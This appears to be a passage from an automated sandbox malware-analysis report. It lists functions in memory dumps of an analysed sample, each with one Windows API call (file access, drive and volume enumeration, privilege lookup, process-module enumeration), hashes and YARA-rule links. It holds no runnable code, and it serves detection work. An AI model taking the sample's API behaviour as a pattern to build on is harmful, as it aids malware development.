                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 3e715de801bcc7cda5128bae8d3bad83b940c762d1ccd6a3c005af9315f48c22
                                                    • Instruction ID: fa963bfe3ce67b66917d5cff9b344c4ab6f60bbc5c42597762d292fcec369469
                                                    • Opcode Fuzzy Hash: 3e715de801bcc7cda5128bae8d3bad83b940c762d1ccd6a3c005af9315f48c22
                                                    • Instruction Fuzzy Hash: 26215E7550D3C09FDB12CB25DC55B96BFB4AF03224F1D84DAE988CF693D2659408C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: f7a3e5a536e7421093340e1f29188c4d05550e448eed808f5dd249fd44dcee72
                                                    • Instruction ID: bb0fc477c7b112ab6a9a140adf0d41fdc36675170774098932be471dec9f163b
                                                    • Opcode Fuzzy Hash: f7a3e5a536e7421093340e1f29188c4d05550e448eed808f5dd249fd44dcee72
                                                    • Instruction Fuzzy Hash: 702192765083809FDB21CF25DC45B96FFF4EF06220F0984AAED898B562D235A448DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E8AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 3c82a4a52b2a4b7e2bfe540a03741e5bfb90b0f9bf4849009bc4a7b46db72153
                                                    • Instruction ID: ed647c99b31cc664f2a674cdb9aada1d0aa9ea533efa4fb3c2522962d46dcb36
                                                    • Opcode Fuzzy Hash: 3c82a4a52b2a4b7e2bfe540a03741e5bfb90b0f9bf4849009bc4a7b46db72153
                                                    • Instruction Fuzzy Hash: 122172716053809FE722CF29DC44B56FFE8EF46214F0884ABED49CB652D265E804CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: ac7f23a8861b381c2f3fbb49f466d93796fd4baaa09f8072714de624001f8ee0
                                                    • Instruction ID: b8e61c160a63c9f3a6bf82f65f20b28f052b6bb179c84c8548e83d74d5696590
                                                    • Opcode Fuzzy Hash: ac7f23a8861b381c2f3fbb49f466d93796fd4baaa09f8072714de624001f8ee0
                                                    • Instruction Fuzzy Hash: 182192765093C09FDB128B25DC55A96BFA4EF07220F0984DADD858F263D224A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 028D1148
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 80fcbe5aa33c0c4b66406cf6c54a5cfa33b1bdbe93053fb72f2b6ecbc0be84ed
                                                    • Instruction ID: cc1f276f068b4c839ad5c26392bfb6b9cf3e7c17a60880abd4af433c2ee9674b
                                                    • Opcode Fuzzy Hash: 80fcbe5aa33c0c4b66406cf6c54a5cfa33b1bdbe93053fb72f2b6ecbc0be84ed
                                                    • Instruction Fuzzy Hash: 6D216D7540D3C09FD7138B259C54A62BFB4EF57620F0980DBDC888F2A3D2696808D772
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 01E8AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 39b33b3eb86a79820522549df0fc3749457fa29b30c0e01feaf6f66121d41c72
                                                    • Instruction ID: 8bfd17d08eb38282168503cdfe8f63919f565277dcf9cd65ff2d1b89b7312b75
                                                    • Opcode Fuzzy Hash: 39b33b3eb86a79820522549df0fc3749457fa29b30c0e01feaf6f66121d41c72
                                                    • Instruction Fuzzy Hash: 9811C172500300EFEB21DF55DC85BAAFBA8EF44720F14846AFD098B281D674A945CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8BA10, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E8BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: f619fd339b73f1433c267fd470e1daf3e49e88f3ec9cf68a401e768afe068765
                                                    • Instruction ID: 3e7c4fdb0dd86e0feb7b6c8186268c6531fcc52378f466b251843c45a58c3b10
                                                    • Opcode Fuzzy Hash: f619fd339b73f1433c267fd470e1daf3e49e88f3ec9cf68a401e768afe068765
                                                    • Instruction Fuzzy Hash: 4211A272504380AFDB22CF65CC84B56FFF4EF05250F08849EE9898B662D375E418CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0886, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 028D08E5
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: c71b1abf34f2d39cc62d3fd6e5a2aff2ba339f48be5dfd7d6f18b538bf2ab9c8
                                                    • Instruction ID: a81e651ff5a3e9feb2c8fad659656ebebf965f94fc40d298ca2ee913e09caa7e
                                                    • Opcode Fuzzy Hash: c71b1abf34f2d39cc62d3fd6e5a2aff2ba339f48be5dfd7d6f18b538bf2ab9c8
                                                    • Instruction Fuzzy Hash: 3011EF7A000304EFEB21CF51DC80FAAFBA8EF04320F04856AED089A241C270A508CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8A33C, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01E8A39C
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: c4ba7eb01690e16b6fb50b75d11c5ea1b3ec52fb404e66575d2d3029a719bd07
                                                    • Instruction ID: 0ca6d2b8f7d6f0f59b3c0c76f8d00105323212cd39000e2ddc06b02724aa1b7e
                                                    • Opcode Fuzzy Hash: c4ba7eb01690e16b6fb50b75d11c5ea1b3ec52fb404e66575d2d3029a719bd07
                                                    • Instruction Fuzzy Hash: 8B116D715093C09FE7128B15DC54AA6BFB4DF47624F0880DBEDC84B253D265A808DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D12D8, Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 028D132F
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: 98d9538402eba6afc85cd5a0a75cbb6a637a31e3d8047bfb399559571a94119b
                                                    • Instruction ID: 8ba304f21c452d9cbbe90d09c67dd3fa0afdb017194b874a1f6af273c13b7a0a
                                                    • Opcode Fuzzy Hash: 98d9538402eba6afc85cd5a0a75cbb6a637a31e3d8047bfb399559571a94119b
                                                    • Instruction Fuzzy Hash: E21191755093849FDB11CF25DC89B96FFE4EF06220F0984EEED498B652D279A808CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D05E8, Relevance: 1.6, APIs: 1, Instructions: 54fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 028D0640
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: cb27de5079b75ab0f48f1d05379c92ac5db354d2735bec07eddf4d95af42b878
                                                    • Instruction ID: 1e567a9c32163840309718458f93e2982727ad6a594d2ca8ff0d26c67d6db7b3
                                                    • Opcode Fuzzy Hash: cb27de5079b75ab0f48f1d05379c92ac5db354d2735bec07eddf4d95af42b878
                                                    • Instruction Fuzzy Hash: B011C6795093C09FD7128B15DC95B52FFB4DF43220F0880DBED858B653D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8AAD2, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01E8AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: cff5bfbda9d3b59a525dca9eb8897fa190b2dc93a970e8b7037bea92ac0dd551
                                                    • Instruction ID: d9c9c7f4f3f69e0b72a3e9647b98f6db85f758bad0589de050714f100c32cff3
                                                    • Opcode Fuzzy Hash: cff5bfbda9d3b59a525dca9eb8897fa190b2dc93a970e8b7037bea92ac0dd551
                                                    • Instruction Fuzzy Hash: 541152756007009FEB20EF59DC8579AFBD8EB45625F08847ADD0ECB642D674E404CA71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8AA0F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01E8AA71
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    • Opcode ID: 181a1cd7c8c404f64666d42806c16428b1fd87fea2dd5d9042cb28669a5d1132
                                                    • Instruction ID: 7a6b09b8965555dcaa5c7642cd4d649570dfa362894c90f7fd46cdeef14ef7c9
                                                    • Opcode Fuzzy Hash: 181a1cd7c8c404f64666d42806c16428b1fd87fea2dd5d9042cb28669a5d1132
                                                    • Instruction Fuzzy Hash: D611C1754097C09FD7128B15DC85A92BFB0EF03224F0A80DBDD898F263D268A909C762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D092F, Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 028D099C
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: f66074be69de3c4e09ccab4ce7da0928e2fbc86990536bd1b703b231d82038d8
                                                    • Instruction ID: 63394ed753929d0ceef65432274a594c4dbcdb28a72d90835b76e360b339e8b4
                                                    • Opcode Fuzzy Hash: f66074be69de3c4e09ccab4ce7da0928e2fbc86990536bd1b703b231d82038d8
                                                    • Instruction Fuzzy Hash: 3911BF755093C09FE712CB25DC95B92FFB4EF07324F0980DADD888B263D265A908CB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D07C6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,988013B0,00000000,00000000,00000000,00000000), ref: 028D0819
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 3d85d0e7f0f76cfd546136823f4ef6025aba2c8c66fd8764503469867ac8194d
                                                    • Instruction ID: 22bdcf67a5f73094992c2ba76baefebe2aec0a28c72d11c16c511b13564da89f
                                                    • Opcode Fuzzy Hash: 3d85d0e7f0f76cfd546136823f4ef6025aba2c8c66fd8764503469867ac8194d
                                                    • Instruction Fuzzy Hash: E101C079540704EFFB20DF15DC85BA6FB98DF04721F1480AAED099A241D674A908CAB2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D13AA, Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 65590dc1436ec3aa3108645ccf3bf25570d7684c669ec23abe01caadff87587e
                                                    • Instruction ID: 346d5e4b576a1f3f47cbe981f1b5fb80399ab8e9658874554069fef5dd1eefbe
                                                    • Opcode Fuzzy Hash: 65590dc1436ec3aa3108645ccf3bf25570d7684c669ec23abe01caadff87587e
                                                    • Instruction Fuzzy Hash: 13118E7A500700DFEB20CF55DC89B66FBA5EF04620F08C4AAED49CB651D775E408CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8AB75, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01E8ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: e0b5b5a756dac0dc931b52500d7675c7cdd87ad7dfc94e3d776c9a1d7b98e3c7
                                                    • Instruction ID: 68c956a630fd9c79ce210fa0dc001da168d117c40e37ccb08036ad4158edfb4b
                                                    • Opcode Fuzzy Hash: e0b5b5a756dac0dc931b52500d7675c7cdd87ad7dfc94e3d776c9a1d7b98e3c7
                                                    • Instruction Fuzzy Hash: A411C2B55093809FDB11CF15DC85B86BFA4EF42224F0980ABDD498F253D274A508CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8BA32, Relevance: 1.5, APIs: 1, Instructions: 49fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01E8BA7E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: cd356524acf5e4d54cf4ac4edf339ffc58d78f32d15b0add503bcda72e467a83
                                                    • Instruction ID: 05219a9714c18b18dcdc8f308a066cf739f1c4bd56a33f2721aae02148cc457d
                                                    • Opcode Fuzzy Hash: cd356524acf5e4d54cf4ac4edf339ffc58d78f32d15b0add503bcda72e467a83
                                                    • Instruction Fuzzy Hash: 5B11A172500700DFEB21DF59DC84B56FFE4EF08261F0885AAEE8D8A612D371E414DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8A1EE, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumWindows.USER32(?,00000E9C,?,?), ref: 01E8A23E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumWindows
                                                    • String ID:
                                                    • API String ID: 1129996299-0
                                                    • Opcode ID: 408a39cff8155d4df27214af1512c84e7cd85c98c3a7e2fdb4ceb7932280a758
                                                    • Instruction ID: 76e18b8fb002e2112231e8dab0fb90aa798b02777b2420aa9bc7f6f5088fd0e7
                                                    • Opcode Fuzzy Hash: 408a39cff8155d4df27214af1512c84e7cd85c98c3a7e2fdb4ceb7932280a758
                                                    • Instruction Fuzzy Hash: 62018471900600AFE310DF16DC86B66FBF8FB84A60F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0196, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028D01D0
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: d491cb6554ecc68acb674bff00c881fd6659cb4317150ceb3d364c56921b6b00
                                                    • Instruction ID: 47f90383998b414635f5ff6a8a9702be8f47ee7a29974aaeed29e5a7da076d75
                                                    • Opcode Fuzzy Hash: d491cb6554ecc68acb674bff00c881fd6659cb4317150ceb3d364c56921b6b00
                                                    • Instruction Fuzzy Hash: EE019E796003048FEB10DF2ADC857AAFBA8DB01324F0884AADD09CB642D774E408CA62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D104E, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 028D109E
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: bfff54e6a50ada56b83ff2820673fd355e88485af585f79adca68932d896cb58
                                                    • Instruction ID: a030bd4c40edec0f0b0d3c95ae6070304c953201d081fad819c863c7a2473998
                                                    • Opcode Fuzzy Hash: bfff54e6a50ada56b83ff2820673fd355e88485af585f79adca68932d896cb58
                                                    • Instruction Fuzzy Hash: ED017172900600AFE310DF16DC86B66FBA8FB84A60F14816AED089B741D235F515CBE5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8BAFA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: dcff50f8a828e3c3388977e27fece6aa95a4d88c28b308fc4fdde958ba6b2a81
                                                    • Instruction ID: 6d6945fa83a583563c534bb4b42bf1c8be50212c67da7c8a31e75ca4d50fe84c
                                                    • Opcode Fuzzy Hash: dcff50f8a828e3c3388977e27fece6aa95a4d88c28b308fc4fdde958ba6b2a81
                                                    • Instruction Fuzzy Hash: CE01DF75500600DFEB20DF19DC857AAFBA4EF05620F08C4AADD0E8B656D275E804CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D12FA, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 028D132F
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    • Opcode ID: e8b54c05a4a6eec1f6d15c5ed88dd4e7a009b511f7a3e162f5d645c4e629b01a
                                                    • Instruction ID: 8a855e79d2861c602665666582a58fddd09aa9efaf6de5cb3cd2d17967b50c47
                                                    • Opcode Fuzzy Hash: e8b54c05a4a6eec1f6d15c5ed88dd4e7a009b511f7a3e162f5d645c4e629b01a
                                                    • Instruction Fuzzy Hash: 7A017C79604344DFEF14DF19DC897AAFBA4EF05620F08C4AADD09CBA52D679A408CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8A8FA, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01E8A94A
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 579f089862ff7956e1b8ae8a8fefe6e9f560c676cfcf905174d06c3b0f074fa1
                                                    • Instruction ID: f8eec08fc8870a7ed48f0c601526617f5da6b11ebfd86c6a3481efe3c9bc96f1
                                                    • Opcode Fuzzy Hash: 579f089862ff7956e1b8ae8a8fefe6e9f560c676cfcf905174d06c3b0f074fa1
                                                    • Instruction Fuzzy Hash: CC01A272900600ABD310DF16DC82B26FBB8FB88B20F14821AED084B741D235F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D04B2, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 028D0502
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 876ceb913dcf66338fee76cf62f4ec7e7b12c660b7e9a5122cc7873c60add9af
                                                    • Instruction ID: b40dfdcc8273aa88865ed6a46725a10f88c5deef196278e94ee6e28b195bff37
                                                    • Opcode Fuzzy Hash: 876ceb913dcf66338fee76cf62f4ec7e7b12c660b7e9a5122cc7873c60add9af
                                                    • Instruction Fuzzy Hash: 6101A272900600ABD310DF16DC82B26FBB8FB88B20F14821AED084B741D235F515CBE6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D0F76, Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 028D0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 44c80fb5eea41d608ab2e49b4fcbeb178e2c95f80c5908f47245f70efd2aa81d
                                                    • Instruction ID: 8786ab0d60d72528aefa2f25a8ec81b74e42145b78a88f86f83365b1a0424852
                                                    • Opcode Fuzzy Hash: 44c80fb5eea41d608ab2e49b4fcbeb178e2c95f80c5908f47245f70efd2aa81d
                                                    • Instruction Fuzzy Hash: 4C017C79504344DFEB10DF16D885BAAFBA4EB00764F1884AADD49CF686D774E408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D060E, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 028D0640
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    • Opcode ID: 03c7642c99abe31c1f760c99354d48219d6a81f1651d697bcd585f5031236de2
                                                    • Instruction ID: 4d5c5a814970ff583e5fb9041329f0e91b8564047a10913b2d44b78d1cb554c5
                                                    • Opcode Fuzzy Hash: 03c7642c99abe31c1f760c99354d48219d6a81f1651d697bcd585f5031236de2
                                                    • Instruction Fuzzy Hash: 1201D17D600704CFEB109F15E885765FBA0DF41724F08C0AADD098B752D274E408CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8AB9A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01E8ABC9
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    • Opcode ID: f70f2434abe19ffe726ca9a4ce53c49a5dc3b51176d9f8401b4bc3525ad8d01f
                                                    • Instruction ID: 1d54a5a17cca7d4a891a979af134232097b608beee5915b866d4f2e785cf8ae7
                                                    • Opcode Fuzzy Hash: f70f2434abe19ffe726ca9a4ce53c49a5dc3b51176d9f8401b4bc3525ad8d01f
                                                    • Instruction Fuzzy Hash: 9F01AD71504640CFEB10EF19D88579AFBA4DB44220F08C4BBDD0D8B202D678A404CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D1116, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 028D1148
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2176660963.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: e74dcc9e3b513f3f858c471cda7e3265ae54cb19dcbfa77ca9a2d57eaa1aa157
                                                    • Instruction ID: 849082e8f6339dfa2a8ef2caeae3dba6673507ef2a09197155dd235efa19aab5
                                                    • Opcode Fuzzy Hash: e74dcc9e3b513f3f858c471cda7e3265ae54cb19dcbfa77ca9a2d57eaa1aa157
                                                    • Instruction Fuzzy Hash: 7BF0A93D504744DFEB20CF05DC89766FBA4EF05A25F08C1AADD4D8B712D679A448CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01E8A36A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01E8A39C
                                                    Memory Dump Source
                                                    • Source File: 00000018.00000002.2166534885.0000000001E8A000.00000040.00000001.sdmp, Offset: 01E8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    • Opcode ID: d3bdb0675f2757cfe3774d2d17cfa49b1b426b1c635392c6532acd835c8b9dd6
                                                    • Instruction ID: 8c996cc2508b95d948dc390ecfac4b9798f3c277945d4dd66359f51d6437f27e
                                                    • Opcode Fuzzy Hash: d3bdb0675f2757cfe3774d2d17cfa49b1b426b1c635392c6532acd835c8b9dd6
                                                    • Instruction Fuzzy Hash: 81F0AF35504740DFEB20EF09D885769FBA0EF45625F08D0ABDD4D4B712D3B5A504CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 028D096A, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 028D099C
